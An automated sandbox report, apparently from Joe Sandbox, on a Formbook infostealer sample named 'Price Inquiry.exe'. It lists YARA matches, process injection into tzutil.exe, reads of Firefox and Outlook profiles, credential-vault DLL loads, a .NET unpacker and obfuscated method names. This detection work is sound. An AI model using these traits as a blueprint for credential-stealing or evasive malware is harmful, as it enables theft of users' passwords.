Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031138E0	9_2_031138E0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CFF09	9_2_031CFF09
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03111F92	9_2_03111F92
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CFFB1	9_2_031CFFB1
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03119EB0	9_2_03119EB0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031C1D5A	9_2_031C1D5A
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03113D40	9_2_03113D40
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031C7D73	9_2_031C7D73
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0312FDC0	9_2_0312FDC0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_03189C32	9_2_03189C32
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031CFCF2	9_2_031CFCF2
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005A1D60	9_2_005A1D60
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0059CC97	9_2_0059CC97
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0059CCA0	9_2_0059CCA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0059CEC0	9_2_0059CEC0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0059AF40	9_2_0059AF40
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0059AF3B	9_2_0059AF3B
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005A5420	9_2_005A5420
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005A35FB	9_2_005A35FB
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005A3600	9_2_005A3600
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005BB9A0	9_2_005BB9A0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_02EBE3C4	9_2_02EBE3C4
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_02EBE4E3	9_2_02EBE4E3
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_02EBCB73	9_2_02EBCB73
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_02EBD8E8	9_2_02EBD8E8
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_02EBE87C	9_2_02EBE87C

Source: C:\Windows\SysWOW64\tzutil.exe	Code function: String function: 03157E54 appears 102 times
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: String function: 0317EA12 appears 86 times
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: String function: 0318F290 appears 105 times
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: String function: 030FB970 appears 280 times
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: String function: 03145130 appears 58 times
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: String function: 01727E54 appears 102 times
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: String function: 0174EA12 appears 86 times
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: String function: 0175F290 appears 105 times
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: String function: 016CB970 appears 275 times
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: String function: 01715130 appears 58 times

Source: Price Inquiry.exe, 00000000.00000002.2177286642.000000000112E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Price Inquiry.exe
Source: Price Inquiry.exe, 00000000.00000000.2155854883.0000000000A32000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameuif.exeD vs Price Inquiry.exe
Source: Price Inquiry.exe, 00000000.00000002.2182737950.00000000079A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Price Inquiry.exe
Source: Price Inquiry.exe, 00000004.00000002.2437001703.00000000017CD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Price Inquiry.exe
Source: Price Inquiry.exe, 00000004.00000002.2435770568.0000000001157000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametzutil.exej% vs Price Inquiry.exe
Source: Price Inquiry.exe	Binary or memory string: OriginalFilenameuif.exeD vs Price Inquiry.exe

Source: Price Inquiry.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.Price Inquiry.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.Price Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4627716653.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2460854368.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4627610599.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2438337305.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4627308589.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Price Inquiry.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, AaoJxxUR5A2r4FK02k.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, AaoJxxUR5A2r4FK02k.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, AaoJxxUR5A2r4FK02k.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/2@12/9

Source: C:\Users\user\Desktop\Price Inquiry.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Price Inquiry.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Price Inquiry.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\tzutil.exe

File created: C:\Users\user\AppData\Local\Temp\q3a81SS

Jump to behavior

Source: Price Inquiry.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Price Inquiry.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Price Inquiry.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tzutil.exe, 00000009.00000002.4625966716.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.4625966716.0000000002BA4000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.2621525076.0000000002BA4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Price Inquiry.exe

ReversingLabs: Detection: 73%

Source: unknown	Process created: C:\Users\user\Desktop\Price Inquiry.exe "C:\Users\user\Desktop\Price Inquiry.exe"
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process created: C:\Users\user\Desktop\Price Inquiry.exe "C:\Users\user\Desktop\Price Inquiry.exe"
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process created: C:\Users\user\Desktop\Price Inquiry.exe "C:\Users\user\Desktop\Price Inquiry.exe"
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
Source: C:\Windows\SysWOW64\tzutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process created: C:\Users\user\Desktop\Price Inquiry.exe "C:\Users\user\Desktop\Price Inquiry.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process created: C:\Users\user\Desktop\Price Inquiry.exe "C:\Users\user\Desktop\Price Inquiry.exe"	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Price Inquiry.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Price Inquiry.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\tzutil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Price Inquiry.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Price Inquiry.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Price Inquiry.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: tzutil.pdbGCTL source: Price Inquiry.exe, 00000004.00000002.2435770568.0000000001157000.00000004.00000020.00020000.00000000.sdmp, pfyyryeDyx.exe, 00000008.00000003.2373227335.000000000108B000.00000004.00000020.00020000.00000000.sdmp, pfyyryeDyx.exe, 00000008.00000002.4626448814.0000000001096000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pfyyryeDyx.exe, 00000008.00000000.2357724606.00000000002BE000.00000002.00000001.01000000.0000000C.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4620673028.00000000002BE000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: Price Inquiry.exe, 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.2439255607.0000000002F26000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.2436823754.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Price Inquiry.exe, Price Inquiry.exe, 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.2439255607.0000000002F26000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.2436823754.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tzutil.pdb source: Price Inquiry.exe, 00000004.00000002.2435770568.0000000001157000.00000004.00000020.00020000.00000000.sdmp, pfyyryeDyx.exe, 00000008.00000003.2373227335.000000000108B000.00000004.00000020.00020000.00000000.sdmp, pfyyryeDyx.exe, 00000008.00000002.4626448814.0000000001096000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	.Net Code: kpjc91UKPm System.Reflection.Assembly.Load(byte[])
Source: 0.2.Price Inquiry.exe.79a0000.5.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	.Net Code: kpjc91UKPm System.Reflection.Assembly.Load(byte[])
Source: 0.2.Price Inquiry.exe.40a85c0.2.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	.Net Code: kpjc91UKPm System.Reflection.Assembly.Load(byte[])

Source: Price Inquiry.exe

Static PE information: 0xE95D05C1 [Sun Jan 24 16:07:29 2094 UTC]

Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 0_2_076B04E8 push esp; ret	0_2_076B04E9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_004030F0 push eax; ret	4_2_004030F2
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_004121CC push 0000006Eh; retf	4_2_004121DD
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0041428F push 78B5E34Ch; iretd	4_2_004142B4
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0041845E pushfd ; iretd	4_2_00418466
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_00418DCF push edi; ret	4_2_00418DD6
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_00417DE4 push eax; iretd	4_2_00417DE5
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_00415E23 push ecx; retf	4_2_00415E43
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_00401ED6 push esi; ret	4_2_00401ED7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0041A6DD push eax; ret	4_2_0041A6DE
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0041A741 push ebp; iretd	4_2_0041A743
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0040CF89 pushfd ; ret	4_2_0040CF8B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016A225F pushad ; ret	4_2_016A27F9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016A27FA pushad ; ret	4_2_016A27F9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D09AD push ecx; mov dword ptr [esp], ecx	4_2_016D09B6
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016A283D push eax; iretd	4_2_016A2858
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016A9939 push es; iretd	4_2_016A9940
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_031009AD push ecx; mov dword ptr [esp], ecx	9_2_031009B6
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0059E2E8 push esp; ret	9_2_0059E2EA
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005B4290 push ebp; ret	9_2_005B434A
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005A4CF1 push eax; iretd	9_2_005A4CF2
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005A2D30 push ecx; retf	9_2_005A2D50
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_0059F0D9 push 0000006Eh; retf	9_2_0059F0EA
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005A536B pushfd ; iretd	9_2_005A5373
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005A75EA push eax; ret	9_2_005A75EB
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005A764E push ebp; iretd	9_2_005A7650
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005A5CDC push edi; ret	9_2_005A5CE3
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_005A9F23 push 856542C8h; iretd	9_2_005A9F28
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_02EC0241 push edi; ret	9_2_02EC0247
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_02EB1123 push ecx; ret	9_2_02EB1124
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 9_2_02EBD451 push ebx; retf	9_2_02EBD452

Source: Price Inquiry.exe

Static PE information: section name: .text entropy: 7.769889240510903

Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, t6GfKnmHYpwpCSCCjl.cs	High entropy of concatenated method names: 'ohgjr0VBwr', 'ti0jDFp7RC', 'sF0j4IPFSp', 'Hy2jNPt0Bk', 'csljfa2Dgc', 'mIqjBxWJB0', 'DQ9j6lsyox', 'MYNj06tKcd', 'uNSjildMFP', 'aVsjdVhq8q'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, JRBr5URymULf9YT4Zh.cs	High entropy of concatenated method names: 'Dispose', 'bZ8XYni8Oi', 'WhyMK4on7o', 'G7qSS6aBmm', 'gPNXmK7f3O', 'Rl3XzFT06C', 'ProcessDialogKey', 'CmIM2ZcuLK', 'Ba8MXtPLRd', 'kfYMMMlZms'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, KZVZQQa8VUxqSC8DSa.cs	High entropy of concatenated method names: 'ToString', 'Fa5pn3yflj', 'lLYpKYIVhR', 'qg6p5c56ll', 'XcNpVY8yrW', 'o5NpujeU2F', 'Irmphv4hn6', 'S4pposesxT', 'EaTpT6LRns', 'O28pUPPGEd'
Source: 0.2.Price Inquiry.exe.40205a0.3.raw.unpack, K8VuqkW7uTS3bswUVa1.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fOSZljo30i', 'gN6ZvLJhDk', 'CXfZW1J6AD', 'Ae8ZQmJCmN', 'iNRZRCN2cZ', 'C7AZsJbsmF', 'M3PZgbSbTU'
